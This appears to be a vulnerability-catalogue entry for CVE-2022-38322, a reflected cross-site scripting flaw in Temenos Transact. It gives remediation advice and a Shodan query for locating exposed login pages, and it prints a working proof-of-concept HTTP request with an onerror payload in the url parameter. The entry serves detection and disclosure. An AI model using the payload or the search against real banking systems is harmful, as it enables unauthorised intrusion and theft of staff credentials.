🔙 목록으로 돌아가기

CVE-2022-38322: Temenos Transact - Cross-Site Scripting

TitleTemenos Transact - Cross-Site Scripting
Authorqotoz
SeverityHigh
ImpactAttackers can inject malicious JavaScript through the helprequest.jsp component, potentially stealing banking credentials and session tokens from employees using the Temenos core banking platform.
RemediationUpdate Temenos Transact to a patched version that properly sanitizes the url parameter in helprequest.jsp and encodes output to prevent XSS attacks.
Shodan Queryhttp.title:"transact sign in","t24 sign in"
Tags cve cve2022 temenos transact xss vuln

🔍 Vulnerability Description

Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.

🌐 HTTP Request

GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38322.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-38322.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A